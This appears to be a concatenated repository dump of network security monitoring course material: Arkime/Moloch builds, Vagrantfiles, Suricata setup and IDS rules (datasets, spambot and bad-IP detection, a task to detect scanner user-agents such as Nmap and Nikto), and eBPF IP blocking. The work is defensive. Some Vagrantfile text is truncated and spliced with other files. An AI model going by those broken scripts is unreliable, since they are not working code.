41 | config.vm.define 'moloch-build' do |box| 42 | box.vm.box = "ubuntu/bionic64" 43 | box.vm.hostname = 'moloch-build' 44 | box.vm.network :private_network, ip: "192.168.56.12" 45 | box.vm.provider :hyperv do |hv, override| 46 | hv.cpus = 4 47 | hv.maxmemory = 4096 48 | override.vm.box = "generic/ubuntu1804" 49 | #override.vm.synced_folder ".", "/vagrant", type: "smb" 50 | end 51 | box.vm.provider :virtualbox do |vb| 52 | vb.customize ["modifyvm", :id, "--memory", "4096"] 53 | vb.customize ["modifyvm", :id, "--cpus", "4"] 54 | end 55 | #config.vm.provision "shell", inline: $script 56 | config.vm.provision "shell", inline: $docker 57 | config.vm.provision "shell", inline: $moloch 58 | end 59 | end 60 | -------------------------------------------------------------------------------- /Arkime/setup/build-freebsd.md: -------------------------------------------------------------------------------- 1 | # Building Moloch from source 2 | 3 | see 4 | * https://github.com/aol/moloch#building-and-installing 5 | * https://github.com/aol/moloch/wiki/Settings#Basic_Settings 6 | * https://nodejs.org/en/download/package-manager/ 7 | 8 | 9 | Install dependencies. 10 | 11 | ``` 12 | pkg install openjdk8 elasticsearch6 node8 lua53 wget curl pcre flex bison 13 | pkg install gettext e2fsprogs-libuuid glib gmake p5-JSON 14 | ``` 15 | 16 | Set up ES java heap size. 17 | 18 | ``` 19 | vmstat 20 | vim /usr/local/etc/elasticsearch/jvm.options 21 | ``` 22 | 23 | Rule of thumb is 50 per cent of all system memory but no more than 31(ish) gigabytes. It's okay to use less for testing environment that also houses moloch capture, viewer, wise, etc. 24 | 25 | ``` 26 | -Xms512m 27 | -Xmx512m 28 | ``` 29 | 30 | Start ES service 31 | 32 | ``` 33 | sysrc elasticsearch_enable=YES 34 | service elasticsearch start 35 | ``` 36 | 37 | ``` 38 | curl -ss -XGET 127.0.0.1:9200/_cat/nodes 39 | ``` 40 | 41 | ## Moloch 42 | 43 | ### Nodejs 44 | 45 | Dependency for viewer. Node 8.9 is required for Moloch 1.0.0 and beyond, 6.13 for 0.50 and older. 46 | 47 | * https://nodejs.org/dist/ 48 | 49 | ### get the source 50 | ``` 51 | git clone https://github.com/aol/moloch 52 | cd moloch 53 | git checkout -b 'v1.1.0' 54 | ``` 55 | 56 | ### configure, make install 57 | 58 | * PS! Check the filesystem paths. Chosen `/opt/moloch` is arbitrary choice of the instructor and may not reflect your environment. Vagrant build machine will use non-privileged directory in user home directory. 59 | 60 | ``` 61 | ./easybutton-build.sh -d /opt/moloch 62 | sudo gmake install 63 | ``` 64 | 65 | ### Basic configuration 66 | 67 | Download geoIP databases. 68 | 69 | ``` 70 | cd /opt/moloch/bin 71 | cat ./moloch_update_geo.sh 72 | ``` 73 | 74 | Create unprivileged user 75 | 76 | ``` 77 | pw group add moloch 78 | pw user add moloch -g moloch -s /usr/bin/false 79 | ``` 80 | 81 | Create PCAP storage directory. Set permissions 82 | 83 | ``` 84 | mkdir /srv/pcap 85 | chown -R moloch:moloch /srv/pcap 86 | usermod -d /srv/pcap moloch 87 | ``` 88 | 89 | ``` 90 | cd /opt/moloch/etc 91 | cp config.ini.sample config.ini 92 | vim config.ini 93 | ``` 94 | 95 | * Point moloch to ES HTTP proxy(s) 96 | * Set capture interface 97 | * PCAP storage directory 98 | * geoIP, ASN, RIR database locations 99 | * unprivileged user/group 100 | 101 | Create moloch database 102 | 103 | ``` 104 | cd /opt/moloch/db 105 | ./db.pl --help 106 | ``` 107 | 108 | Start moloch-capture 109 | 110 | ``` 111 | /opt/moloch/bin/moloch-capture --help 112 | ``` 113 | 114 | Create user for viewer 115 | 116 | ``` 117 | cd /opt/moloch/viewer 118 | nodejs addUser.js -c /opt/moloch/etc/config.ini 119 | ``` 120 | 121 | Start viewer 122 | 123 | ``` 124 | nodejs viewer.js -c /opt/moloch/etc/config.ini 125 | ``` 126 | 127 | ### testing capture without viewer 128 | 129 | ``` 130 | curl 127.0.0.1:9200/_cat/indices 131 | ``` 132 | 133 | * expect to see index `sessions2-YYMMDD` 134 | * problem with capture if missing, please read capture console logs carefully 135 | * if present, check if you actually have messages in the index 136 | 137 | ``` 138 | curl 127.0.0.1:9200/sessions2-YYMMDD/_search?pretty 139 | ``` 140 | ``` 141 | ls -lah /srv/pcap 142 | tcpdump -r *.pcap -c1 143 | curl -ss -XGET 127.0.0.1:9200/_cat/indices 144 | curl -ss -XGET 127.0.0.1:9200/sessions-*/_search?pretty -d '{"size":1}' 145 | ``` 146 | 147 | ### Finally, ... 148 | 149 | * pushing to background (&, nohup, stdout/stderr) 150 | * rc 151 | * data retention 152 | 153 | --- 154 | [next : Advanced Configuration](/Arkime/config.md) 155 | -------------------------------------------------------------------------------- /Arkime/suricata/README.md: -------------------------------------------------------------------------------- 1 | # Integrating Suricata with Arkime 2 | 3 | Arkime has a plugin for Suricata which enables enriching sessions with Suricata alerts. This allows for filtering sessions which have triggered a Suricata alert. 4 | 5 | Requirements for the plugin to work: 6 | 7 | * Suricata and Arkime Capture must see the same traffic. 8 | * Arkime must be able to access the eve.json log from Suricata. 9 | * Arkime will try match sessions based on the 5-tuple from the eve.json file. 10 | * Only events with the event type of `alert` are considered. 11 | 12 | Expected outcome 13 | 14 | * This plugin adds new fields to Arkime (similarly to like wise and tagger). 15 | * Sessions that have been enriched will have several new fields, all starting with the `suricata` prefix. 16 | * There will be a separate `Suricata` sub-section in the Arkime sessions view. 17 | * A query to find all sessions that have Suricata data is `suricata.signature == EXISTS!`. 18 | 19 | 20 | ## Configure Arkime 21 | 22 | Append `suricata.so` to your `config.ini` plugins line 23 | 24 | ``` 25 | plugins=wise.so;suricata.so 26 | ``` 27 | 28 | `suricataAlertFile` should be the full path to your eve.json file. `suricataExpireMinutes` option specifies how long Arkime will keep trying to match past suricata events. Note: When processing old PCAPs you need to compensate for the time from `now() - pcap-record-date`. 29 | 30 | ``` 31 | suricataAlertFile=/var/log/suricata/eve.json 32 | suricataExpireMinutes=60 33 | ``` 34 | 35 | ## Install and (minimally) configure Suricata 36 | 37 | Naturally you will also need Suricata. If it's not already installed, you need to install it. 38 | 39 | For Ubuntu there's a [PPA for Suricata](https://redmine.openinfosecfoundation.org/projects/suricata/wiki/Ubuntu_Installation_-_Personal_Package_Archives_%28PPA%29), so that's the most convenient way of installing the latest stable version of Suricata. 40 | 41 | ``` 42 | apt-get install software-properties-common 43 | add-apt-repository ppa:oisf/suricata-stable 44 | apt-get update 45 | apt-get install suricata 46 | ``` 47 | 48 | That's it! Suricata is installed. However let's check the Suricata log file `/var/log/suricata/suricata.log`. 49 | 50 | ``` 51 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Unable to find iface eth0: No such device 52 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Couldn't init AF_PACKET socket, fatal error 53 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_FATAL(171)] - thread W#01-eth0 failed 54 | ``` 55 | 56 | We need to modify `/etc/suricata/suricata.yaml` file to point Suricata to the correct network interface 57 | 58 | ``` 59 | # Linux high speed capture support 60 | af-packet: 61 | - interface: enp11s0 62 | ``` 63 | 64 | Restart the Suricata systemd service and check the logs again. 65 | 66 | ``` 67 | systemctl restart suricata.service 68 | less /var/log/suricata/suricata.log 69 | ``` 70 | 71 | The errors for the interface should be gone now. However check if and how many Suricata rules/signratures were loaded? 72 | 73 | ``` 74 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_NO_RULES(42)] - No rule files match the pattern /var/lib/suricata/rules/suricata.rules 75 | 13/6/2023 -- 19:36:20 - - No rules loaded from suricata.rules. 76 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_NO_RULES_LOADED(43)] - 1 rule files specified, but no rules were loaded! 77 | ``` 78 | 79 | Suricata has a Rule management tool called `suricata-update`. 80 | 81 | ``` 82 | # see various options 83 | suricata-update --help 84 | # Fetch ET Open ruleset for Suricata 85 | suricata-update --etopen 86 | ``` 87 | 88 | You should see something like 89 | 90 | ``` 91 | 13/6/2023 -- 19:52:30 - -- Writing rules to /var/lib/suricata/rules/suricata.rules: total: 42944; enabled: 34152; added: 42944; removed 0; modified: 0 92 | ``` 93 | 94 | Once again, restart the Suricata service to make sure the new rules are loaded. 95 | 96 | ``` 97 | systemctl restart suricata.service 98 | less /var/log/suricata/suricata.log 99 | ``` 100 | 101 | ``` 102 | 13/6/2023 -- 20:28:54 - - Loading rule file: /var/lib/suricata/rules/suricata.rules 103 | 13/6/2023 -- 20:29:02 - - 1 rule files processed. 34152 rules successfully loaded, 0 rules failed 104 | 13/6/2023 -- 20:29:02 - - Threshold config parsed: 0 rule(s) found 105 | 13/6/2023 -- 20:29:02 - - 34155 signatures processed. 1277 are IP-only rules, 5214 are inspecting packet payload, 27457 inspect application layer, 108 are decoder event only 106 | ``` 107 | 108 | ## Checking the results 109 | 110 | Now that Suricata is installed and running, we can restart our Arkime Capture and Viewer, so that our earlier changes will take effect. Arkime Capture will load the Suricata module and start parsing the eve.json file. 111 | 112 | ``` 113 | systemctl restart arkimecapture.service 114 | systemctl restart arkimeviewer.service 115 | ``` 116 | 117 | We need some traffic that would fire off a Suricata alert. 118 | 119 | ``` 120 | curl -s http://www.testmyids.com 121 | ``` 122 | 123 | Wait for the session to get indexed and see the results from Arkime Viewer. You can use the filter `suricata.signature == EXISTS!` for finding sessions with Suricata matches. 124 | 125 | -------------------------------------------------------------------------------- /Arkime/tuning/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | $script = <<-SCRIPT 5 | systemctl stop systemd-resolved.service 6 | echo "nameserver 1.1.1.1" > /etc/resolv.conf 7 | SCRIPT 8 | 9 | $docker = <<-SCRIPT 10 | export DEBIAN_FRONTEND=noninteractive 11 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 12 | apt-get -qq -y install \ 13 | apt-transport-https \ 14 | ca-certificates \ 15 | curl \ 16 | gnupg-agent \ 17 | software-properties-common 18 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 19 | add-apt-repository \ 20 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 21 | $(lsb_release -cs) \ 22 | stable" 23 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 24 | systemctl enable docker.service 25 | systemctl start docker.service 26 | adduser vagrant docker 27 | SCRIPT 28 | 29 | $jupyter = <<-SCRIPT 30 | apt-get update && apt-get install -y python3 python3-pip 31 | su - vagrant -c "pip3 install --user --upgrade jupyter jupyterlab elasticsearch" 32 | su - vagrant -c "mkdir ~/.jupyter" 33 | cat >> /home/vagrant/.jupyter/jupyter_notebook_config.json < /etc/resolv.conf 7 | SCRIPT 8 | 9 | $docker = <<-SCRIPT 10 | export DEBIAN_FRONTEND=noninteractive 11 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 12 | apt-get -qq -y install \ 13 | apt-transport-https \ 14 | ca-certificates \ 15 | curl \ 16 | gnupg-agent \ 17 | software-properties-common 18 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 19 | add-apt-repository \ 20 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 21 | $(lsb_release -cs) \ 22 | stable" 23 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 24 | systemctl enable docker.service 25 | systemctl start docker.service 26 | adduser vagrant docker 27 | SCRIPT 28 | 29 | $jupyter = <<-SCRIPT 30 | apt-get update && apt-get install -y python3 python3-pip 31 | su - vagrant -c "pip3 install --user --upgrade jupyter jupyterlab elasticsearch" 32 | su - vagrant -c "mkdir ~/.jupyter" 33 | cat >> /home/vagrant/.jupyter/jupyter_notebook_config.json < Suricata is a free and open source, mature, fast and robust network threat detection engine. The Suricata engine is capable of real time intrusion detection (IDS), inline intrusion prevention (IPS), network security monitoring (NSM) and offline pcap processing. 11 | 12 | # Suricata 13 | 14 | ## Day 0: Intro - Mon, Oct 17, *starts at 11:00* 15 | 16 | * 11:00 - 12:30 17 | * [Intro](/common/day_intro.md) 18 | * [singlehost](/singlehost) 19 | * [vagrant](/Suricata/vagrant) 20 | * [what is Suricata](/Suricata/intro) 21 | * 13:30 - 16:30 22 | * [Suricata on CLI](/Suricata/intro) 23 | * [Suricata language server](https://www.stamus-networks.com/blog/suricata-language-server) 24 | * [writing your first rule](/Suricata/intro#writing-your-first-rule) 25 | 26 | ## Day 1 - Tue, Oct 18, 08:30 27 | * 08:30 - 12:30 28 | * [EVE log basics](/Suricata/eve) 29 | * [EVE basic tasks](/Suricata/eve#tasks) 30 | * [rule writing, cont](/Suricata/rules) 31 | * 13:30 - 16:30 32 | * [Unix socket mode](/Suricata/unix-socket) 33 | * [datasets](/Suricata/datasets) 34 | 35 | ## Day 2 - Wed, Oct 19, 08:30 36 | * 08:30 - 12:30 37 | * [datasets, cont](/Suricata/datasets) 38 | * [building suricata](/Suricata/build) 39 | * 13:30 - 16:30 40 | * [configuring suricata](/Suricata/config) 41 | 42 | ## Day 3 - Thu, Oct 20, 08:30 43 | * 08:30 - 12:30 44 | * [Introducing rulesets](/Suricata/rulesets) 45 | * [Ruleset exploration show and tell](/Suricata/rulesets#show-and-tell) 46 | * [suricata-update](/Suricata/suricata-update) 47 | * 13:30 - 16:30 48 | * [SELKS](/Suricata/selks) 49 | * [Hunting notebooks](/Suricata/selks#suricata-analytics) 50 | 51 | ## Day +1: Last but not least - Fri, Oct 21, 08:30 52 | * 08:30 - 10:00 53 | * [open for requests](/Suricata) 54 | * 10:30 - 11:30 55 | * [feedback, contact exchange, thanks, etc.](/common/Closing.md) 56 | 57 | ### Before You Come To Class please browse trough .. 58 | 59 | * [prereqs](https://github.com/ccdcoe/CDMCS/tree/master/prerequisites) 60 | * [singlehost](https://github.com/ccdcoe/CDMCS/tree/master/singlehost) 61 | * [suricata](https://suricata.readthedocs.io/en/latest/) 62 | * [vagrant](https://github.com/ccdcoe/CDMCS/tree/master/common/vagrant) 63 | -------------------------------------------------------------------------------- /Suricata/build/hyperscan.md: -------------------------------------------------------------------------------- 1 | # Building hyperscan 2 | 3 | **Only do this if you build Suricata for performance on a platform that does not provide hyperscan binary packages. Building it will take long time and will melt your laptop! This section is only for reference!** 4 | 5 | * https://01.org/hyperscan 6 | * https://github.com/intel/hyperscan 7 | 8 | In addition to prior build tools, install cmake and friends. 9 | 10 | ``` 11 | apt-get install -y cmake ragel libboost-all-dev sqlite3 12 | ``` 13 | 14 | Grab the source. 15 | 16 | ``` 17 | git clone https://github.com/intel/hyperscan /home/vagrant/hyperscan-build 18 | cd /home/vagrant/hyperscan-build 19 | git checkout $VERSION 20 | ``` 21 | 22 | Build locally using cmake. 23 | 24 | ``` 25 | cmake -DCMAKE_INSTALL_PREFIX=/home/vagrant/Libraries -DCMAKE_INSTALL_LIBDIR=lib -DBUILD_STATIC_AND_SHARED=1 26 | ``` 27 | 28 | Then compile and install. Parallelize to whatever number of CPU threads you have and go grab a coffee. This may take a while. 29 | 30 | ``` 31 | make -j4 && make install 32 | ``` 33 | 34 | If on laptop, put it down for health and safety and make sure it is not on battery power. 35 | 36 | ``` 37 | coretemp-isa-0000 38 | Adapter: ISA adapter 39 | Package id 0: +100.0°C (high = +84.0°C, crit = +100.0°C) 40 | Core 0: +96.0°C (high = +84.0°C, crit = +100.0°C) 41 | Core 1: +100.0°C (high = +84.0°C, crit = +100.0°C) 42 | Core 2: +99.0°C (high = +84.0°C, crit = +100.0°C) 43 | Core 3: +92.0°C (high = +84.0°C, crit = +100.0°C) 44 | 45 | acpitz-acpi-0 46 | Adapter: ACPI interface 47 | temp1: +98.0°C (crit = +200.0°C) 48 | 49 | thinkpad-isa-0000 50 | Adapter: ISA adapter 51 | fan1: 3478 RPM 52 | ``` 53 | 54 | Finally, configure suricata with hyperscan library directories. See `cmake` flags in prior commands. 55 | 56 | ``` 57 | cd 58 | ./configure --prefix= --with-libhs-includes=/home/vagrant/Libraries/include/hs --with-libhs-libraries=/home/vagrant/Libraries/lib 59 | ``` 60 | 61 | Note that suricata may not start up with this config, as system runtime is unaware of custom shared library directory. 62 | 63 | -------------------------------------------------------------------------------- /Suricata/build/intro.md: -------------------------------------------------------------------------------- 1 | # Intro 2 | 3 | ## Why 4 | 5 | * So, why build if we can install? 6 | * Each env in different, each org has its own policies and setup; 7 | * Goal is to understand how Suricata is set up, what goes in; 8 | * must understand when debugging; 9 | * for analysts: garbage in -> garbage out; 10 | * even if you won't build your own, you need to understand input; 11 | * you don't see something, could be packet loss, overloaded rule, missing features; 12 | * you need to explain WHY you did not find the bad thing; 13 | * you need to propose how to debug rulesets, configs, etc; 14 | * might not be able to do that without custom builds; 15 | * remember, one rule can kill your performance; 16 | * custom build in prod; 17 | * could be prohibited by policy; 18 | * that's backward thinking (for OSS); 19 | * custom build == code audit == protect against supply chain attack; 20 | * one big central IDS is pretty common, needs to optimize; 21 | * Why NOT to run custom build in prod; 22 | * policy prohibits, no resources to audit code; 23 | * many probes, distributed, needs deploy system and central management; 24 | -------------------------------------------------------------------------------- /Suricata/data-exploration/999-tasks.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Tasks\n", 8 | "\n", 9 | "* Parse eve.json from singlehost as presented in `001-load-eve`, collect unique SID values for frequent alerts;\n", 10 | " * Use these values to generate `disable.conf` for `suricata-update`;" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": null, 16 | "metadata": {}, 17 | "outputs": [], 18 | "source": [] 19 | } 20 | ], 21 | "metadata": { 22 | "kernelspec": { 23 | "display_name": "Python 3", 24 | "language": "python", 25 | "name": "python3" 26 | }, 27 | "language_info": { 28 | "codemirror_mode": { 29 | "name": "ipython", 30 | "version": 3 31 | }, 32 | "file_extension": ".py", 33 | "mimetype": "text/x-python", 34 | "name": "python", 35 | "nbconvert_exporter": "python", 36 | "pygments_lexer": "ipython3", 37 | "version": "3.8.1" 38 | } 39 | }, 40 | "nbformat": 4, 41 | "nbformat_minor": 4 42 | } 43 | -------------------------------------------------------------------------------- /Suricata/datasets/README.md: -------------------------------------------------------------------------------- 1 | # Datasets 2 | 3 | * https://suricata.readthedocs.io/en/latest/rules/datasets.html 4 | 5 | IDS rules have historically been rather static and self-contained entities. Threat detection, however, requires us to be dynamic and flexible. Consider [sslbl ja3 blacklist](https://sslbl.abuse.ch/blacklist/ja3_fingerprints.rules) as an example. Each black or whitelisted hash needs to be separate rule with distinct ID. We could use PCRE with alternation, but that would kill our IDS performance. Best way to get around this limitation has been to generate those rules. While there is nothing wrong with this approach, it is still a hack around design limitations. Furthermore, entire ruleset needs to be reloaded if entries are added or removed from this list. 6 | 7 | `Datasets` is a new (ish) feature for eliminating this limitation. Any sticky buffer can be hooked to a list of base64 strings, md5, or sha256 hashes. `Datarep` is the same thing, but each entry can also be assigned a score. You can then define a threshold inside a rule, so it would trigger if reputation is above or below a numeric value. 8 | 9 | ## Basic usage with Suricata 5.0.x 10 | 11 | `Dataset` can be created in `suricata.yaml` and then invoked in a rule. 12 | 13 | ``` 14 | datasets: 15 | defaults: 16 | memcap: 10mb 17 | hashsize: 1024 18 | ua-sha256: 19 | type: sha256 20 | state: /var/lib/suricata/useragents-sha256.lst 21 | ``` 22 | 23 | ``` 24 | alert http any any -> any any (msg:"HTTP user-agent list"; http.user_agent; to_sha256; dataset:isset,ua-sha256; sid:123; rev:1;) 25 | ``` 26 | 27 | Alternatively, the rule could be rewritten to contain all needed parameters. Modifying `suricata.yaml` would not be needed in that case. 28 | 29 | ``` 30 | alert http any any -> any any (msg:"HTTP user-agent list"; http.user_agent; to_sha256; dataset:isset,ua-sha256,type sha256, state /vagrant/seen-dns.lst; sid:123; rev:1;) 31 | ``` 32 | 33 | ## Basic usage with Suricata 6.0.x 34 | 35 | All parameters can be set in the signature 36 | 37 | ``` 38 | alert http any any -> any any (msg:"HTTP user-agent list"; http.user_agent; to_sha256; dataset:isset,ua-sha256,type sha256, state /vagrant/seen-dns.lst, memcap 10mb, hashsize 1024; sid:123; rev:1;) 39 | ``` 40 | 41 | ## Live update 42 | 43 | Here is the important section. 44 | 45 | ``` 46 | dataset:isset,ua-sha256,type sha256, state /vagrant/seen-dns.lst 47 | ``` 48 | 49 | Note that rule starts with `isset` to verify existence of list element. You could also use `isnotset` to check for element to be absent and `set` to add a missing element to the list. Items can be added to the set manually via `dataset-add` unix socket command. 50 | 51 | ## Dataset rule 52 | 53 | Suppose we have a list of spambot mail servers from threat intel feed, stored in some plaintext file. For example in `/tmp/mailservers.lst`. Good PCAP to test it is [here](https://malware-traffic-analysis.net/2020/12/07/index.html). We can write a following rule that on its own does not do much. 54 | 55 | ``` 56 | alert dns any any -> any any (msg:"Spambot mailservers seen"; dns.query; dataset:isset,spambots, type string, state /tmp/mailservers.lst, memcap 10mb, hashsize 10000; sid:123; rev:1;) 57 | ``` 58 | 59 | Note that: 60 | * Name of the dataset is `spambots`; 61 | * Dataset file location is in `/tmp/mailservers.lst` 62 | * We are limiting the memory usage and hastable size of this set to 10MB and 10000 elements respectively; 63 | * Rule produces a new alert whenever someone does a DNS query to a domain that we have labeled as spambot; 64 | 65 | ## Adding elements 66 | 67 | Adding a element, such as `mail.militaryrelocator.com` to this list requires us to base64 encode it when using `string` datatype. 68 | 69 | ``` 70 | echo -n mail.militaryrelocator.com | base64 71 | ``` 72 | 73 | Using `sha256` datatype requires hashing the added value instead. 74 | 75 | ``` 76 | echo -n mail.militaryrelocator.com | sha256sum 77 | ``` 78 | 79 | Note that calling `echo` would implicitly add a newline symbol to the string. While barely visible to human eye, it's nothing more than extra char to computer. No different from any other letter. And that would affect the base64 value of the string. Suricata does not add this newline, so base64 would differ. We use `echo -n` to avoid this issue. 80 | 81 | We could append output of this command directly to `/tmp/mailservers.lst` and then start Suricata. Or we could start Suricata (for example in unix-socket mode if working on offline PCAPs) and use `dataset-add` command to insert the element. 82 | 83 | ``` 84 | ./bin/suricatasc -c "dataset-add spambots string $(echo -n mail.militaryrelocator.com | base64)" 85 | ``` 86 | 87 | **Suricata must be shut down for it to store newly added datasets on disk!** Once you have done this, you can verify that added element is in persistence file. 88 | 89 | ``` 90 | grep `echo -n mail.militaryrelocator.com | base64` /tmp/mailservers.lst 91 | ``` 92 | 93 | With little scripting, you can easily add a lot of elements to that set. 94 | 95 | ``` 96 | cat mailservers.txt | while read line ; do ./bin/suricatasc -c "dataset-add spambots string $(echo -n $line | base64)" ; done 97 | ``` 98 | 99 | ## Setting new values in rules 100 | 101 | Alternatively, we could simply generate a list of unique mail servers with following rules. Note that we are using `set` keyword to add new elements to hash table, whereas before we were using `isset` to check for element existence. 102 | 103 | ``` 104 | alert dns any any -> any any (msg:"New mailserver query seen"; dns.query; content: "mail"; startswith; dataset:set,new-mailservers, type string, state /tmp/new-mailservers.lst, memcap 10mb, hashsize 10000; sid:123; rev:1;) 105 | ``` 106 | 107 | ## IP dataset in Suricata 7.x 108 | 109 | Initial implementation of datasets only supported sticky buffers, which are part of the rule options. However, this meant IP addresses could not be checked with a dataset since IP matching is part of rule header. This has been fixed in suricata 7, as sticky buffers for IP matching are now available. 110 | 111 | * https://docs.suricata.io/en/suricata-7.0.5/rules/ipaddr.html#ip-addresses-match 112 | 113 | ``` 114 | alert ip [$HOME_NET] any -> any any (msg:"Bad IP seen 124"; sid: ; rev: 1; ip.dst; dataset:isset,bad-ip,type ip, load bad-ip.lst, hashsize 10000;) 115 | ``` 116 | 117 | Unlike string type, IP addresses do not have to be base64 encoded. 118 | 119 | ## Tasks 120 | 121 | Use PCAP files specified by the instructors. 122 | 123 | * Write one single rule detecting default user-agents (exact matches on lowercase strings are fine); 124 | * Python; 125 | * Nikto; 126 | * Dirbuster; 127 | * Nmap; 128 | * Curl 129 | * Create a `string` list of all unique **dns queries**, **http user-agents**, **http.uri**, **ja3 fingerprints** and **TLS certificate issuers**; 130 | * lists should be generated **without getting any alerts**; 131 | * Verify each list element with `base64 -d`; 132 | * From those lists, select some interesting values and add them to new dataset; 133 | * Ensure that you get alerts when those elements are observed in PCAP or on wire; 134 | * Write a script that generates a dataset called `ad-domain-blacklist` from [this hosts file](https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts); 135 | * Enhance the prior solution to also add reputation value for each entry; 136 | -------------------------------------------------------------------------------- /Suricata/docker/dalton/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | export debian_frontend=noninteractive 4 | export port=8089 5 | 6 | bash stop.sh 7 | 8 | echo "provisioning dalton" 9 | [[ -d dalton ]] || git clone https://github.com/secureworks/dalton.git 10 | cd dalton && grep $port .env || sed -i "s/DALTON_EXTERNAL_PORT=80/DALTON_EXTERNAL_PORT=$port/g" .env 11 | 12 | if [ -f "/etc/arch-release" ]; then 13 | sudo bash -c "time docker-compose build && docker-compose up -d" 14 | else 15 | time docker-compose build && docker-compose up -d 16 | fi 17 | -------------------------------------------------------------------------------- /Suricata/docker/dalton/stop.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | echo "stopping dalton" 4 | [[ -d dalton ]] || exit 1 5 | cd dalton 6 | 7 | if [ -f "/etc/arch-release" ]; then 8 | sudo bash -c "docker-compose stop && docker-compose rm -f" 9 | else 10 | time docker-compose stop && docker-compose rm -f 11 | fi 12 | 13 | -------------------------------------------------------------------------------- /Suricata/docker/redisLogging/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.2' 2 | services: 3 | elasticsearch: 4 | image: docker.elastic.co/elasticsearch/elasticsearch-oss:6.1.2 5 | container_name: elasticsearch 6 | ports: 7 | - "9200:9200" 8 | #- "9300:9300" 9 | environment: 10 | #- cluster.name=docker-cluster 11 | - "ES_JAVA_OPTS=-Xmx1g -Xms1g" 12 | ulimits: 13 | memlock: 14 | soft: -1 15 | hard: -1 16 | # volumes: 17 | # - type: bind 18 | # source: /srv/pcap/elasticsearch 19 | # target: /usr/share/elasticsearch/data 20 | kibana: 21 | image: docker.elastic.co/kibana/kibana-oss:6.1.2 22 | container_name: kibana 23 | ports: 24 | - "5601:5601" 25 | depends_on: 26 | - elasticsearch 27 | logstash: 28 | image: docker.elastic.co/logstash/logstash-oss:6.1.2 29 | container_name: logstash 30 | depends_on: 31 | - elasticsearch 32 | volumes: 33 | - ./logstash-redis-ela.conf:/usr/share/logstash/pipeline/logstash.conf 34 | redis: 35 | image: redis 36 | container_name: redis 37 | ports: 38 | - "6379:6379" 39 | -------------------------------------------------------------------------------- /Suricata/docker/redisLogging/logstash-redis-ela.conf: -------------------------------------------------------------------------------- 1 | input { 2 | redis { 3 | data_type => "list" 4 | host => "redis" 5 | port => 6379 6 | key => "suricata" 7 | tags => ["suricata", "CDMCS", "fromredis"] 8 | } 9 | } 10 | filter { 11 | json { 12 | source => "message" 13 | } 14 | if 'syslog' not in [tags] { 15 | mutate { remove_field => [ "message", "Hostname" ] } 16 | } 17 | } 18 | output { 19 | elasticsearch { 20 | hosts => ["elasticsearch"] 21 | index => "suricata-%{+YYYY.MM.dd}" 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Suricata/ebpf/README.md: -------------------------------------------------------------------------------- 1 | # eBPF and XDP 2 | 3 | See 4 | * Documentation: https://suricata.readthedocs.io/en/latest/capture-hardware/ebpf-xdp.html 5 | * Talk on Suricata, XDP and eBPF: https://home.regit.org/~regit/suricata-ebpf.pdf 6 | * BPF cli wrapper: https://github.com/StamusNetworks/bpfctrl.git 7 | 8 | **Vagrant env has most libraries and tools in `/data` folder.** Please use `root` user for the duration of this exercise. Many things may otherwise be installed locally for regular user and debugging those issues is not the purpose of this exercise. 9 | 10 | **Commands in this README serve illustrative purpose**. Please follow official Suricata documentation for updated reference. 11 | 12 | ## Building a eBPF enable Suricata 13 | 14 | Suricata uses libbpf to interact with eBPF. The library is available at https://github.com/libbpf/libbpf 15 | and is already cloned in the libbpf directory inside the `/data` directory. Build it from 16 | the `src` directory with a traditional 17 | 18 | ``` 19 | make 20 | make install 21 | ``` 22 | 23 | To enable eBPF support you need to pass a series of flags to suricata configure: 24 | 25 | ``` 26 | ./configure --enable-ebpf --enable-ebpf-build CC=clang-6.0 27 | ``` 28 | 29 | You can then build and install the software 30 | 31 | ``` 32 | make -j4 33 | make install 34 | make install-conf 35 | ``` 36 | 37 | ## Setup 38 | 39 | ### System 40 | To used pinned maps, you first have to mount the `bpf` pseudo filesystem :: 41 | 42 | ``` 43 | sudo mount -t bpf none /sys/fs/bpf 44 | ``` 45 | 46 | ### Suricata 47 | 48 | Suricata configuration file section on af-packet needs to be updated to have the eBPF filter 49 | setup and pinned maps activated: 50 | 51 | ``` 52 | af-packet: 53 | - interface: enp0s8 54 | ebpf-filter-file: /home/vagrant/suricata/ebpf/filter.bpf 55 | pinned-maps: true 56 | ``` 57 | 58 | By pointing directly to the eBPF filter in the source tree we will be able to update it easily later. 59 | 60 | ### CLI tooling 61 | 62 | See [bfpctrl git page](https://github.com/StamusNetworks/bpfctrl.git) for setup instructions. However, do not clone entire linux source repository as instructed in readme. It is big. An unpacked kernel tarball is already prepared in `/data`. 63 | 64 | ## Usage 65 | 66 | ### Setting things up 67 | 68 | Find an IP address you can communicate with on primary vagrant box interface and add it to the block list 69 | with `bpfctrl`. 70 | 71 | The syntax is `bpfctrl -m /sys/fs/bpf/suricata-wlp4s0-ipv4_drop ipv4 --add 1.2.3.4=1` where `1.2.3.4` is the IP to add and `bpfctrl -m /sys/fs/bpf/suricata-wlp4s0-ipv4_drop ipv4 --remove 1.2.3.4` to remove. 72 | 